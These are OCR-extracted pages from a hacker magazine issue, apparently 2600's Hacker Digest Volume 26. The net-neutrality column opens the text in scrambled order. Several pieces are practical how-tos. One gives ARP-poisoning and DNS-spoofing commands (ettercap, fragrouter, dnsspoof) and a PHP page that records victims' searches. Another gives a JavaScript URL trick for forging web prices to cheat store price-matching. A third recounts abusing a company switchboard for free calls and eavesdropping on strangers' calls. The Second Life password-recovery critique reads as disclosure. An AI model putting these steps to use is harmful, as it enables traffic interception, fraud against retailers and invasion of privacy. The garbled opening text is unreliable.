If you weren’t already familiar with the concept of network neutrality and the threats against it. http:// ➥w w w .com/help/ ➥netneutrality. including legal use. or political party. and the old school UPL and f0ur0ne0ne (RIP) crew. http://www. Customers were not informed of these attempts.org/wiki/Network ➥_ n e u t r a l i t y _ i n _ t h e _ U n i t e d _ ➥States User-contributed/edited entries regarding the debate. and we can still help shape the outcome of the battle in a way that’s favorable to the future of the Internet and to us as consumers.com Representing consumers. ➥ openInternetcoal ➥ition. here are some websites I’d recommend as a starting point: • SavetheInternet.R. most vocal opponents of network neutrality. as it had been prior to 2005. Shout Outz: bex0. the Open Internet Coalition includes big names such as Google.5353 Internet Freedom Preservation Act of 2008 on OpenCongress. The company has gone so far as to (admittedly) underhandedly block members of the general public (many of whom had gathered to speak against the company) from FCC hearings regarding Comcast’s actions against its users. nova. but all BitTorrent traffic. but the market as well). • http://en.R. then I apologize for being the bearer of bad news. Skype.com A coalition. This certainly is not the only example of an ISP abusing its power. • H. Comcast is one of the major.wikipedia. but already we are seeing big business taking advantage of the consumer. jenn. consider the fairly recent (October 2007) attempts of Comcast to prevent traffic generated by its customers through BitTorrent. eBay. the phonelosers forum users.org/wiki/ ➥Network_neutrality and http:// ➥en. The numbers are clearly in favor of an Internet that is free and open. Not surprisingly. • Open Internet Coalition. but is trying to make sure that the decision-makers don’t hear the public voice. graphix. Rob T Firfely. It might be a hard battle. grassroots organizations. I’ll see you on the open. Altalp. PayPal.wikipedia.5353.html Google discusses its support for network neutrality. rbcp. As a very real example. and more (some of those in the world of big business understand that a lack of net neutrality doesn’t only hurt the consumer. Phractal.google. http://www. murd0c. and we are certainly not in the clear.savetheInternet. The debate rages on. Comcast understands what the general public wants. Certainly.THE HACKER DIGEST .com Spread the word about network neutrality and counteract the misinformation campaigns of big business!
Is This Really A Threat?
If you’d like to learn a little more and keep yourself up-to-date on the events surrounding the network neutrality debate. o r g / b i l l / ➥110-h5353/show In-depth discussion and analysis on H. it also subverted the notion of a free market (a free market can not regulate itself without an informed consumer – especially when they’re uninformed against their will). RogueClown.

I started thinking up more projects in this vein which I began to call “data-mining as an offensive weapon.” The ease and influence one had simply by merging databases and running some deadsimple analyses inspired me.I liked playing video games and especially finding counterintuitive abuses in the rules to give myself an edge. illegal. I was inspired by an article in this very magazine entitled “CampusWide Wide Open” by Acidus. I did a cute data-mining project that cross-referenced birth and marriage records across the state of Texas to automatically discover Mother’s Maiden Names (as far as I can tell. and met Douglas Hofstadter. H2K. It had a 33Mhz processor. Throughout my sophomore year. The article made complete sense to me and I felt it could have deep ramifications.k. This was followed by a civil lawsuit two days later stating that our investigating the flaws in their system was. Hopefully. but it was the search for the most advanced.VOLUME 26
30
. We started up a collaboration to fully flesh out and implement the ideas in his paper. But unless your case is legally unassailable. Unlike many hackers I know. I somehow convinced one of the professors at Indiana University School of Informatics to give me a job doing computer security research. I was politely encouraged to leave.. but I’m not here to talk about that. I graduated high school. Some background about me. insidious ways to get an edge on the online competition that brought me to the security mindset and soon I was noticing compromising blemishes in all sorts of social and technological systems. They favor the prepared. but I made up for it by taking page after page of useless notes. and met Acidus. In my senior year of high school. successfully stop you. We were woefully unprepared. My name is Virgil Griffith. 120MB hard drive. at this point administrators at both of our universities were more than pissed at us for causing a ruckus. the maker of the campus card system. Bach: An Eternal Golden Braid. in fact. the author of Gödel. and a fancy 2400 baud modem. At 17 I attended my first hacker conference. California. and to share some observations about our little community that I never hear anyone talk about. I loved the ingenuity that goes into trying to think of the most perverse things you can do within the game that the designers would have never foreseen someone trying. Oftentimes they don’t even favor who is on the right side of the law. The suit didn’t go so well. a sophomore at Georgia Tech. and we settled out of court under sealed terms. the card access system used at most college campuses nationwide. I didn’t immediately fall in love with programming . but legal courts do not favor who is right. but hours before our talk we were served a temporary retraining order from Blackboard Inc. I dropped out of school and moved to Indiana without a job or studentship.” The idea is simple: 1) take a known security vulner-
THE HACKER DIGEST . So I did. Although. Hacking has a certain mystique. Escher.a. a profoundly sublime book I read in high school.my experiences with it. I study theoretical neuroscience at the California Institute of Technological and am in my second year of graduate school. not even bank employees know why it’s still used as a security question). My day job and career is science. judging from the recent history of hacker cases. you all can learn from this: Talk to a lawyer before you get too deep into your project. artistic enterprise called hacking . Seven months later in April 2003. my family got its first computer when I was seven.Hacker Perspective
Virgil Griffith
Hi. I was excited to give a security talk together (my first). and your case will simply become yet another one of the many cases that fail to establish any useful precedent. While there. Later that year. enrolled at the University of Alabama. I subscribed to 2600 Magazine and in every issue I understood two or three articles well enough to re-implement them or clean up any minor defects in their technique. It was about flaws in the Blackboard Transaction System. at a local hacker conference in Atlanta. what it is to me. I was born and raised in Alabama. Billy Hoffman. a. Anyway. I am 25 years old and live in Pasadena. the company will outspend you. I feel we were completely in the right. This slowly extended into writing scripts within games to perform common tasks more quickly. it’s unlikely you’ll go to jail for trying to do a good deed. in New York. I am here to talk about a creative. I called it “Messin’ with Texas. I understood almost none of the talks.

merely picking off the lowest of the low hanging fruit is so easy. And. yet has huge impact. Hacking is art upon the canvas of the living.. and fulfilling things to do with their time than insisting a certain charming yet nebulous H-word should only be used to describe people in Group A and never to people in Group B. I genuinely enjoy language. There are many many other deeper. Labels of subcultures invariably come to mean different things to different people. For me. An attack that works against .mil inurl:aa. or the stock market. Now that was fun. but occasionally Chaotic Neutral. despite the minor confusion. Sometimes people say they’re into hacking just for fun. Creativity conjoined with technological know-how is the tool of choice. ext:doc site:. ever-changing. unbalanced.THE HACKER DIGEST . the myriad self-described hackers I’ve met are typically: • The Investigative journalists of the online world. Around then. spiraling out of normal control.anyone who enjoys anything remotely technical solely for the sake of it with shades of Loki-like pranksters. I’ve worked on several projects such as extending WikiScanner to catch organizations hiding behind registered accounts (Poor Man’s Check User). Hacking is picking out the counterintuitive. Starcraft. synergistically amplifying their power. sprawling. it’s all just fine. breathing. and second a delightful open-ended game. I read about an IP address deleting unflattering facts from congressmen’s Wikipedia pages and upon manually tracing it back discovered it was in fact registered to the House of Representatives itself! Shortly afterwards. • Playful jokesters. Users could then type in a company and see every anonymous edit that company had made from their offices. searching for ways they could play off each other. hacking is an art form. and another database which listed the registered owner for a given IP address. My paramount goal is shaping the world for the better. ext:doc site:. Since then.to the most banal . dapper trenchcoat wearers. After all of this. So. everyone reading this magazine has much more exciting. hacking is first a means to an end. I wrote a simple tool. and the word “hacker” is no exception. It spans the gamut from the most incidenary .take Go. after three years of science and online hijinks at Indiana University.cyber-criminals . It was a bountiful harvest of public relations disasters for disinformers across the globe. bringing military-strength anonymous publishing to the Internet. If all I wanted was an entertaining. it was discovered that two congressmen had actually hired staffers to police their pages. Hacking is the only game that permits even causal players to influence
What Hacking Means to Me
31
. 2) do it to the entire Internet. I’d play Magic: The Gathering and be done with it. and shifting the course of the whole complex to do something completely unexpected. I honestly I have no idea why more people still don’t use data-mining as an offensive weapon . For me personally. deeply interwoven technological and social systems that make up modern life. but really. open-ended game that required substantial time investment. that took two databases: the database of all Wikipedia edits. for some time everyone has known about Microsoft Word documents containing metadata about recent changes and who made them. as well as forging a conduit between the Tor darknet and the World Wide Web (tor2web). interesting. • People with balls of fucking steel. complex. • People whose mastery of technology has given them disproportionate influence on the Internets. WikiScanner. • Chaotic Good. seldom-explored parts of these systems.some of it quite naughty. more elegant games people play for fun .mil inurl:ab.. I graduated and entered graduate school here in California.mil that Google knew about (ext:doc site:.VOLUME 26
ability.0001 percent of a very big number is a big number. • People for whom almost every social problem has an engineering solution. . • Vigilantes to the extent allowed by law - empowering the good and punishing the bad. In 2007. I look forward to future work to help make the Internet a better place.) and used known techniques to reveal recently deleted text . instead of prescribing a definition. For example.mil inurl:ac. but they’re just being modest. The embarrassment these congressmen rightly deserved was simply delightful and I wondered how hard it would be to automate the entire process over all of Wikipedia. So I downloaded every Word document from . and intrepid open-source developers somewhere in between.

At a given moment. an obscure but handy database. But the differences look big only because the comparison is made under a magnifying glass.
THE HACKER DIGEST . then let us know and we will try to entice them into writing the next Hacker Perspective! Email us at articles@2600. the powers that be recognize half gems too. Half Gems and the Quest for Pure Disruptive Beauty This community . 32
Phillip Torrone
Martin Eberhard
. Just like you. will “fix the problem” or otherwise insulate themselves from it. but nothing to shout from the rooftops. I’ve never heard anyone publicly talk about it.has some strikingly unusual etiquette that the newcomers never get at first. You stop benefiting from them. but it’s 100 percent honest so it has to be worth something. and they stop benefiting from you.
Hacker Perspective is a regular column featuring the views of various luminaries known to the hacker community and oftentimes the mainstream as well. Early career hackers sometimes forget to aspire to something truly novel and great. peoples’ moral intuitions occasionally disagree. hackers spend most of their time looking for the perfect mates for their half gems in hopes of creating that truly novel thing that blind-sides the entire world with its originality and strength. the essence of hacking is the quest to craft the most perfect disruptive gem that changes everything for the better. Disruptive Technologist Virgil Griffith has balls of fucking steel and is known for developing the WikiScanner software. If you blog-narc.a minor unpublished vulnerability. people will stop sharing their half gems with you. In the past. On a day to day basis. a clever new trick. We just happened to be born with a penchant for technology and coloring outside the lines. but unfortunately they can’t share their half gems with everyone. Is there a person you’re aware of who is a known entity and has made a noteworthy accomplishment of some sort that would be recognized by the hacker community? Do you feel this individual would have something of interest to say about what it means to be a hacker? If so. I wish to thank StricK for being the greatest hacker mentor and friend a boy could ever have and without whom I would not be writing this today. Backing out.(sometimes even altering the course of) entities far bigger than them including corporations. Something that’s mildly interesting on its own. I also wish to thank Emmanuel Goldstein for being the spiritual leader of this whole shebang and raising an entire generation of disruptive technologists.com with details.or at least the small slice of it I live in . a little known surprising fact. and I think it sheds light on what motivates hackers. a new twist on an old technique. This is what hacking and the hacker culture is to me. but by and large they see eye to eye. industries. you can’t help but notice the “Hacker Perspective” articles are all quite different. A truly original work of art almost inevitably requires finding two or three half gems that play off each other in just the right way. a hacker knows of between five to 15 “half gems” . And their desire for even small media attention prods them into prematurely publishing ideas on their blog that their friends have been tossing around. If you’ve read this magazine long. we’re all cut from the same idiosyncratic. Within the community. Of course. It’s just worse for everyone all the way around.VOLUME 26
Hackers would rather share. we’ve featured commentaries from:
The Cheshire Catalyst Bruce Schneier Phiber Optik Barry Wels Nick Farr Bre Pettis Mitch Altman Rop Gonggrijp Bill Squire
We want this list to grow even bigger. variegated feeling cloth like everyone else. and the half gem is gone. It’s the massively multi-player online RPG with a vibrant rich world and complex history that you play in real life. I don’t know how representative any of it is. and governments.

MacOS X.
Case Study: Second Life
Motivation for Attack
The attacker has motivation. By clicking the included URL. Finally. and then I sell the in-world money I earn for US dollars on the Lindex currency exchange (http://secondlife. but I immediately got concerned. collaboration. allowing me to bypass the need to have access to my email account altogether. This account represents my entire real-world income (from sales and contracting work). is a multi-user. Gaining access to my account would let an attacker steal my profits. The next page contains the security questions. interactive. p h p ) involves several steps. regardless of the settings on the account in question. Fortunately. I hope your security sense is tingling. I also conduct a fair amount of business in-world for real-world money. this option is only available to IP addresses that have previously successfully logged into the account. I’ve been an avid member of SL for over three and a half years and most of my time in-world is spent on scripting and building. which they could then transfer to a friend’s account and sell.THE HACKER DIGEST . The system emails a one-use URL with a randomly generated code to the email account on file and tells the user to check their email. Some sites will email your password to you in plain text. By ensuring that you provide correct answers to the questions. All of the information I will provide is already wellknown in the community and trivially accessible to motivated attackers. and the system trusts that you should be allowed to reset your password. Users have no set goals. First. or a targeted attack? I knew
one thing: an attacker would have plenty of motivation to take over my account. I got an email from LL that disturbed me. The website also provides another option: “Email no longer active? Click here!” It scared the crap out of me during my tests to see that the “secret” URL was plainly presented to me in that link. Not only have I built up an identity in SL. 3-D virtual world in which users can create an incredible variety of content. open-ended. so what are the potential attack vectors? The password retrieval process for an SL account (https:// ➥ secure-web0. I’m told the third
Attack Vectors
33
. you “prove” that you’re the owner of your email address. Second Life (SL). but instead use the world for socialization. What did the email say? Why was it in German? Who wanted to access my account? Was it random. the website can perfectly verify your identity to ensure that unauthorized parties are not trying to steal your account. Recently. they could take my products and distribute the source code. so I’m very serious about protecting its security. and many other applications. potentially costing me a huge number of sales and doing irrevocable damage to my business. This email is sent in the language of the requester. and it had the subject line “Mein Konto: Kennwortanfrage” which I think translates to “My Account: Password Assistance”.com/currency). It would also allow them to use my credit card on file to buy more in-world currency. A user must successfully answer one of four questions in order to verify their identity. The first question is the secret question the user answered when they created their account.com/ ➥ a c c o u n t / r e q u e s t . available at http:// ➥secondlife. In this article. 3-D modeling. It was in German. others are told to call LL to reset their password. and asks them to provide the first names. I’ll explore the insecurity of these systems through a case study. Many users will ignore such a spurious email. Access to the world is through a standalone client that runs natively on Windows.VOLUME 26
Second Life Hacking
By Lex Neva
Password retrieval systems are ubiquitous on the web. the user visits the website and tells it that they forgot their password. Second. effectively stealing money from me. a language I don’t speak. while others will quiz you with inane “security questions” that you answered when ayou signed up for the account. the system provides the last names of four people the user has added to their “friends list” in SL. art.com/ and created by Linden Lab (LL). It was one of those emails that the service sends you when you tell them you forgot your password. and Linux. I sell products in SL.secondlife. Usually they consist of a link on the login page labeled “Forgot your password?”.

This change is pretty inconvenient for me. I was chagrined to find that my representative knew of no way for me to disable the web-based password recovery system for my account. How can an attacker bypass these security measures? First. they can try to deduce my home location. and searching the web for logs of any conversations I might have been in. An attacker could deduce who might be on my friends list by looking at the membership lists of the groups I’m in.schneier. I could also remove everyone from my friends list. For most users. We had a pretty interesting talk about security. A system is only as secure as its weakest measure.secondlife. SL severely limits where I can set my home location. Since my attacker is in Germany. the attacker is now looking at the page with the security questions. I’ve changed my password. looking in my profile for mentions of friends. Barring that. but I can’t help but feel it’s a worthless exercise. Dan Kiminsky just showed us how an attacker can intercept emails using his DNS cache poisoning vulnerability. In response. The attacker has only three tries. It goes back to an incursion into LL’s systems in 2006 (http:// ➥blog. I called immediately to have my account unblocked and. this is going to be a region in which they own land. In my case. but I found in my tests that they can reload the page as many times as they want without penalty until they get a list of names they know. which would prevent that question from appearing on the questions page at all. assuming the other phone representatives pay attention to that. thanks). right? Chillingly. While it’s often easy for an attacker to discover the answer to a secret question (a good essay about this is here: http://www. or they could hop on my wireless if I was unwise enough to leave it unsecured. they must either intercept the email or come from an IP previously associated with the account. Only one of these questions must be successfully answered to gain access to the account. neither of these is an option. my home location was trivially obvious when looking at my profile.com/blog/ ➥archives/2005/02/the_curse_of_ ➥th. Many users no longer had access to the email address associated with
Mitigation
Why This System?
34
. and they took the obvious step of immediately blocking all access to my account (gee. This was a sensible reaction. but I feel I have no choice. The friends list might be fairly easy to guess because user surnames. I’ve shown that it’s completely feasible for someone to compromise my account. What’s especially interesting is that LL is. I think that the correlation in time between Kiminsky’s talk and the attack on my account is unlikely to be a coincidence. so this is not a feasible mitigation strategy. and it’s easy to find this information using SL’s search system. Logins via the SL client use SSL to avoid transmitting the user’s password hash in the clear. How can I mitigate this threat? I’ve changed my home location to a less guessable place. and the user has 3 attempts before their IP is blocked from the password reset system. LL quickly published details about the attack and invalidated all user passwords.VOLUME 26
option is to provide the exact value of the last payment the user made to LL.html). this would make an already unmanageable user interface even more hostile.doxpara. and I set up a recognition phrase that I must provide in future calls to verify my identity.
What’s especially interesting is why this insecure password recovery system was first put in place. a security-conscious company. but this option was not presented to me because my account is not charged monthly fees. ➥com/?p=1204). in general. are fairly unique inside communities in SL. which are chosen from a long list. other than my own land. they’ll skip right past that and the last billed amount and look at the friends list and the home location. so they’ll have to intercept my email. thankfully. the representative did this for me. In SL. but it meant that thousands of users were thrust upon the mercies of the password recovery system. With that out of the way. They escalated my ticket to find out for sure. and they recommended I change my password. To do this. The final option is to provide the name of the region that the user has set their home point to. in which a large number of password hashes were believed to have been stolen by attackers. and I’ve received no assurances that LL’s resolvers have been patched against Kiminsky’s vulnerability. they must gain access to the page with the security questions. It might be possible to luck into my IP address if they’re using the same internet service provider as I am.com/2006/09/ ➥08/urgent-security-announce ➥ment).THE HACKER DIGEST . Impossible. but. This had the side-effect of freezing my business. I opened a support ticket with LL to let them know how worried I was about those emails I got. and they could do it in a way that I would be unable to detect (read the slides http://www.

finding a good price for an item usually involves the use of scissors and a large stack of Sunday newspaper ads. LL created a special phone line with extra staff to handle password resets. and the employee says that they will match any major retailer’s price on a flyer or webpage printout that is not more than a week old. I find that the lowest anybody is selling the drive for. This stands for the Hypertext Markup Language Document Object Model. until then. They also added new identity verification options to the web-based password recovery system. it is still not low enough for my taste. it is critically important to provide users with a method of disabling it. but to modify the situation to suit your needs.
The concept:
Another concept:
Casing the joint:
into the URL bar on any page. I have no options to increase my security and prevent this attack. Best Buy included. One of the simplest examples is to type
javascript:alert(“Hello World!”).99. I spot my target. and it is used to allow JS code to interact with element tags on a webpage. After returning home and looking through some ads. In some online forums. Price-matching is a wonderful concept that can be invoked when making a purchase. one can present something to the cashier. giving us the system that is still in use today. Not only is it a beautiful piece of hardware. over three months after the events described above. cheaper price and ring it up. So I ponder my next course of action for a couple of days and eventually craft an alternate solution. LL has slightly changed their password reset system. but I need it because my computer’s drive is almost full. I inquire about Best Buy’s price matching policy. I could just go and buy it. such as a competitor’s flyer.99! There is no way that I am paying that much. One day. is $129. I’ve been assured by the developers at Linden Lab that they are looking to provide this option soon but. This gives a person the ability to take advantage of any one store’s sale at any other store. I want to have to call and jump through some very big hoops to prove my identity. and they all started getting mad very quickly. JavaScript Injection allows you to execute arbitrary JS code on any webpage. The cashier will type in the new. There is no longer an option to provide your home location to prove your identity. It’s a Western Digital 320GB My Passport Essential External HDD. The other three options are still available. As of the time of publication. Although this is a much better deal than before. what else can be done? It is part of the hacker mentality not just to wait for the right situation in order to strike.
Final Thoughts
Exploiting Price-Matching through Javascript Injection
By Sigma
In today’s world of retail shopping. I walk into a Best Buy that is located in a mall near my house. When paying for an item. If it is deemed necessary to implement an automated password recovery system. but I notice that the current price is $169. but they solved the problem by severely diminishing the security of the system as a whole. While perusing through the aisles. A popup containing this classic message should
35
. so they swallow their pride and honor the discount. I’m nervous.THE HACKER DIGEST . Worse yet. There still seems to be no way to disable the password reset system entirely for an account. But a system like SL gives an attacker the motivation and means to cause irreparable financial damage. and potentially powerful. Ever notice how those fancy lightboxes expand to fit their content when you click a picture? Those smooth growth actions are provided by the HTML DOM in JS. it’s no big deal if an account gets compromised. Quite easy to do. JavaScript has a handy little feature called the HTML DOM. LL was wise to identify and respond to the breach so quickly. We all obsessively follow deals to find the most opportune time to swoop in and buy what we want before the sale ends and the price returns to normal. But for many out there who have better things to do with their time. On the opposite end of the spectrum is JavaScript Injection. If I am stupid enough to forget my password. Stores will adhere to this because they don’t want customers to go to a competitor’s store. that advertises the item at a lower price.VOLUME 26
their account.

””). or list. Silvia (JS Password Domination) and A5an0 (JS Injection) for similar articles that I found after writing this.innerHTML ➥).) alert(n+”=”+x[n]. This is where the DOM comes in handy. No one expects that someone would forge the contents of a page to cheat a store. I type something like this into the URL field:
javascript:x=document. This prevents the browser from redirecting to a blank page when the code is done. of all the ‘span’ elements on the page. as you will soon see. and that was displayed as the new price. but this also works with Internet Explorer) to a page from Wal-Mart containing the drive I want to purchase. the cashier handed me back the printouts and my new HDD in a bag and said to have a nice day.) x[23]. I typed “$59. The HTML used to generate that item then pops up. Now.VOLUME 26
appear. they think of defacement and identity theft. 3.” He just glanced at the sheets and handed me my item.alert(). knowing the number of the tag I want to modify. picked the HDD off the shelf. Here we are assigning the variable ‘x’ an array. I was still able to save a good 110 dollars. (He just zipped his finger across the keyboard like he does this all day.innerHTML ). some common sense still applies. given the rapid fluctuation in electronics pricing. Now that the text of a webpage has been successfully modified.innerHTML=prompt(“Enter ➥ new text:”.) x=document. Props to Jacob P. the real con can begin.n<x.
Analysis:
New parts broken down again: 1.}
Let me break this down: 1.getElementsByTa ➥gName(“span”). I asked the cashier if they did price-matching (to act clueless). On this page.x[23]. in any webpage there are many different tags and many are ‘span’ elements.) alert().””). The information in this article is for lulz and to be used for educational purposes only. they ignore the possibility of exploitation. as opposed to a URL with http:// or ftp:// 2. Why was this so easy? I suppose it was that when people think of websites getting “hacked” (This is in no way a hack.n++){alert(n+”=”+x[n]. I printed it out along with a couple of pages from other sites. and got in line. but rather a little trick). I took notice of when the popup displayed the current price for the HDD and noted the number. Do not try to buy a laptop for $5. Happy hacking! you to type in the new text to display in the ‘span’ tag. In the end.) Anyway.
The Process:
<span class=”Price4XL”>$124.) javascript: This indicates that we’ll be giving some JavaScript code to the browser. JavaScript Injection can also make use of the HTML DOM to modify the content of a webpage. the ‘span’ tag that held the price was 23rd out of 75. Now.88” into the prompt. this is a really light and fast way to save some cash using the hacker mentality. I type the following into the URL field: 2. He glanced at the 10pt font and typed in the new price. I do some searches with Google and navigate my browser (I will be using Firefox 3 for all examples. some assembly required. He had to call over a floor manager or something to enter his bypass code to allow the sale at the new price. After injecting the new content into the page.getElementsByTagNa ➥me(“span”). Although you don’t get anything for free.’ It will display the innerHTML. there was a series of popups containing the number and content of each ‘span’ tag. I find the price in the page and Right-Click > View Selection Source. When it was my turn.innerHTML=prompt ➥(“Enter new text:”.99. whatever text is typed into the prompt should appear on the page where the old text (or price) used to be. The employees are so busy trying to get the sale that. If done correctly.88</span>
Finishing the job:
javascript:x=document. Then I drove down to Best-Buy.for(n=0. On my page. he said yes and proceeded to ring me up as I presented him with the printouts.n++){} This is a standard for loop that will be used to examine every element of the array contained in ‘x.’ 4. or the HTML contained within the ‘span’ tag. and it looks like this: I note that the price is in a ‘span’ element. I remember my first thought being “that was way too easy. This takes the 23rd element stored in ‘x’ and opens up a popup box that allows
36
. Batteries not included.THE HACKER DIGEST . something like ‘12345’ probably.) for(n=0.n<x. This will generate a popup for each element in ‘x.length. length. When I hit enter.getElementsByTag ➥Name(“span”).

html. be adopted to accomplish a great number of things. Now that our spoofed A record is in place. fwrite($handle.125 www.99 ➥/search?hl=en&q=’ . From here. of course. I’m always amazed at the number of people who do not mind sharing confidential information over any random open network. dsniff can already pick out any plaintext passwords. In the index. like so:
192.” This is not at all the most elegant solution as. in the history. I’ll give you a simple example of setting up your machine for DNS spoofing. $query). Begin with three ready-to-use shells on your machine.txt”.com
You can. with the real google. be it their email credentials. search for the segment ‘<form action=’.com. In the first. and ettercap (for ARP poisoning.168. or proving a point by modifying a Google search result. ‘a’). fwrite($handle. $query .168. poison the router to redirect the victim’s traffic to your machine:
ettercap -T -q -M ARP /victimip/ //
dnsspoof -f myhosts “host victimip”
This will tell dnsspoof to replace the hosts in the file ‘myhosts’ whenever the machine ‘victimip’ makes a query. or even pre-fill the input box with a random phrase. their bank account. or across any public computer. and redirect the user to a static Google IP address so that the real query is displayed.187. fragrouter.
Now we are ready to begin the actual DNS spoof. DNS spoofing is most useful when you get creative.com homepage downloaded as index. performing these spoofs on any network other than your own can land you into a lot of trouble. header(‘Location: http://64. in the example of stealing passwords. On the machine running the web server. fclose($handle). this will be worth a few moments of entertainment. Nor is it any sort of complicated example.THE HACKER DIGEST . Now. As there are many articles that go in depth into how ARP spoofing works. The technique of DNS spoofing involves sending a machine a false DNS record. the dsniff package. use the asterisk to redirect all subdomains. The PHP file is very short:
<?php $query = $_GET[“q”].1. set the page to a different language. I won’t make it a focus in this article.1.html file you retrieved from Google. Create a hosts file that will contain the domain names you want to redirect. though arpspoof from the dsniff package could work as well). Hopefully. we can do any number of things. mischief. and tricking it into going to your own version of whatever website/service you spoofed. have a VirtualHost ready for google.txt. It will then record their search in the file “searches. instead. Replace “/search” with “/collect. in the third terminal.php”. The same technique can. ensure the machine’s traffic is not interrupted by using fragrouter:
fragrouter -B1
This will retrieve the query from the HTTP GET request.233. The tools I will be using are the Apache Web Server. $fname = “searches. such as replace the logo. we can have some fun with it.VOLUME 26
SPOOFING DNS ON A LAN
by Felixalias
Inspired by “Fun With Network Friends’’ by Uriah C. Or. ?>
In the other terminal. with as simple a use as adding a fictitious article to Slashdot. however.125 192. ‘’).google. As with many other articles.com google. we could simply log the searches. $handle = fopen($fname. “\n”). or any other number of important passwords. begin spoofing the DNS:
37
. changing the weather to something ridiculous. and webmitm can help retrieve SSL-encrypted text. or at least awareness of the dangers of trusting networks that are not your own. Of course. a separate untitled page will be listed before the Google search results.

calling someone from a payphone. while laughing myself to tears by prank-calling two numbers at a time and then conferencing myself and them together. they'd dial 2-253-0437 and would be connected courtesy of the company's switchboard! I'd been able to read between the lines to reach a higher level of enlightenment. but the realization that there were those of us who had a knack for reading between the lines and figuring things out. throughout the ages. Why? Because dialing 7 from our desk gave us an outside line for international calls. I had to try the theory out by calling another company's switchboard at night to make sure it would work. especially extensions above the 6000 range.. I stumbled on the final missing piece of knowledge needed for some potentially significant mayhem. then dangling the handset by a piece of tape just above the hook and hanging an 'out of order' sign over it easily took foes offline for the entire weekend. wonder why…" I mean it in the consuming sense. if as a joke. Throughout the world. This is precisely the kind of thing a hacker tunes into.
38
. As soon as we transfer them to that extension. to call anywhere in the world. By ponder. Hippies call it a groove. they'd simply ask for extension 8140. by the way — feel free to call and leave a message!). a plant manager himself will actually make a point to call your home while you're trying to sleep just to inquire about such things. Still. free of charge. We call it hacking. We dialed 8 for long-distance. but only after technicians spend several hours attempting to locate and remove the nonexistent game from the corporate mainframe. It is the inborn nature of a hacker to ponder all possible reasons whenever presented with a directive. or 9 for an outside caller.VOLUME 26
Hacking: An Astronomer's Perspective
by Ethernium57
It began in Junior High. At that time in our rural Missouri town. I was able to point out that the timestamp indicated that it obviously happened a couple hours after I got off work. Well. My guess is that most people would be interested in the part about the free phone calls. what would happen. Duh! My curiosity was piqued when a memo was distributed regarding incoming calls. in dead sleep. "hmm. and 9 for local calls. So. Fortunately. Athletes call it the zone. If an outside caller wanted to call someone in Nebraska at 402-253-0437 (my Grand Central number. a phone connection remained open almost indefinitely until the calling party hung up. it hit me. Your mind processes it day and night until the highest probability reason rises way above all other possibilities and wakes you from dead sleep and you can't wait until morning to put the realization to some use. Why the heck would corporate care if employees transfer an incoming call to a wrong extension — especially a non-existent extension? Wouldn't the caller simply get nowhere and have to call back? Then. Not just the interest in computers and astronomy. If we dialed any 'extension' beginning with 7. As it turns out. I don't mean the casual. The key element of interest for me was that a call could be made across a conferenced line. Like.. that was something MacGyver would have been proud of. we'd literally be conferencing that caller into an outside line where the caller would be free to complete the dialing sequence with their touchtone phone. Combine that little jewel of knowledge with the realization that touch-tones from a conferenced call can dial out on another conferenced line. this has been recognized as an art form and known by many names. Gardeners call it a green thumb. but it hadn't (yet) come to me how I could take this a step farther. Any extension above 6999 was a real problem for corporate. Suddenly you could tap someone's outgoing calls remotely on almost any phone simply by calling the person. Things other people didn't want us figuring out. Days later. 8.THE HACKER DIGEST . This allotted some quiet time to be curious about things. The Chinese call it Kung Fu. I typed "prgm blackjack ended 08:30:27" on the terminal in the office down the hall. Back in the late 90's I worked the graveyard shift alone in the accounting department of a large meat-processing plant. It simply stated that no calls were to be directed to any extension that employees are not familiar with.

She did. Son. Internet cafes. and on and on with little if any assistance or training from other hackers. I became interested in finding loopholes in other things. it's a telescope. I called her. you called me. I hope I don't go to hell for it. and he and I both waited patiently for someone to answer the ringing on the other line.. It's just my nature. voice mail systems. email systems." "But Son. but eventually my girlfriend took notice and bought me a pretty nifty Meade telescope. but rather." (uncomfortable pause) "What do you need dad?" "I'm fine. As I matured beyond such things (or maybe it was just the growing population of people with caller ID). Would this trick work when dialing long distance? One way to find out. and viola. But only if she had a touch-tone phone. I didn't call you.
39
. so it was a great test. I listened as she dialed the number. I dialed the first number on one line. After all. though. I've figured out ways to hack bulletin board systems. He was flirting with my girl (now my ex-wife). Son. You called me!" "Go lie down and take a nap. Finally. Yours too. As soon as I heard him pick up the handset. so I actually bothered to read the instructions that came with it while waiting patiently for the sun to get a move on. I looked in the phone book for two people with the same last name in hopes they would know each other so I could get a conversation started between them. and then she said she was going to call her sister. Then I waited. he picked up the handset to make a phone call of his own." (uncomfortable pause) "Why did you call me Dad?" (uncomfortable pause) "Son. and it worked! I conferenced in my second line when she picked her phone up. cell phones. About that time I got a long-distance call from an ex-girlfriend. dit-dit-dit-dit-dit-dit-ditdit. I then pretended to hang up by conferencing in another line so he would hear a dial tone. I heard an elderly man answer on one line. and how do I take it a step further? My interest in astronomy was merely a curiosity. dialed the second number on the other line. You just need to point it at things. and I'd like to make it up to him by letting him have her. why does it exist. I didn't call you.THE HACKER DIGEST . and almost always without hurting anyone. he had a rotary dial phone! Sadly. It's basically due to three questions that continuously run through my head about everything I encounter. I let her leave a message and I called her back.. you called me. I'm fine thank you. I knew her sister was a long distance call for both of us. I attempted my very first remote phone-tap. apologized for dialing the wrong number. We'll talk about it later. I dropped both lines and decided to try it on someone else. hi Dad." "Hi Son. My most memorable two-line call didn't rely on letting someone think they were dialing a number in privacy. The instructions were pretty straightforward.VOLUME 26
On a side note. obviously. in retrospect. a younger man answered the second line. It was daylight. After only two or three minutes. fortune 500 systems.." "Ok. Always for fun. what possible reasons would they have for not wanting me to do that. Something between the lines just wouldn't let go of me. Son. The conversation that ensued went something like this: "Hello?" "Hello?" "Hello?" "Oh. federal systems.. but I really didn't call you. listening. I dialed that kid's number and. After a few more rings. we talked for a bit. Their conversation turned out to be lengthy and boring and I disconnected them both to spare myself the costly phone bill. I conferenced in my second line for him to have a dialtone. something reminiscent of that phone extension memo caught my attention. in a poorly-disguised voice. I just answered the phone. Before I was done." "Dad. this is one call I shouldn't have made. You called me." Yes. I was there. crap. they thought someone else had. and I had to explore the possibilities. and wearing the grin of a genius mastermind watching my evil plan come to fruition. putting all of this knowledge together. You called me!" In retrospect. it didn't work on my first guinea pig. Dad. and conferenced them together." "No. it rang and her sister answered on the other line. tying up that kid's phone for a weekend from a phone booth was simply uncalled for and childish. websites. security systems." (uncomfortable pause) "You don't need anything Dad?" "No. as you can imagine. I didn't call you. He bought it! He hung up and I didn't.

